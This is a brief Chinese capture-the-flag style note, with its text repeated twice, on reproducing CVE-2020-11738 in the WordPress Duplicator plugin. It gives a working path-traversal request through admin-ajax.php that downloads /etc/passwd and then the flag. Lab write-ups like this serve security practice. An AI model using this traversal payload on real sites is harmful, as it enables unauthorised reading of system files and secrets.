CVE-2020-11738复现

使用/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../etc/passwd
发现可以下载文件

下载flag

CVE-2020-11738复现

使用/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../etc/passwd
发现可以下载文件

下载flag
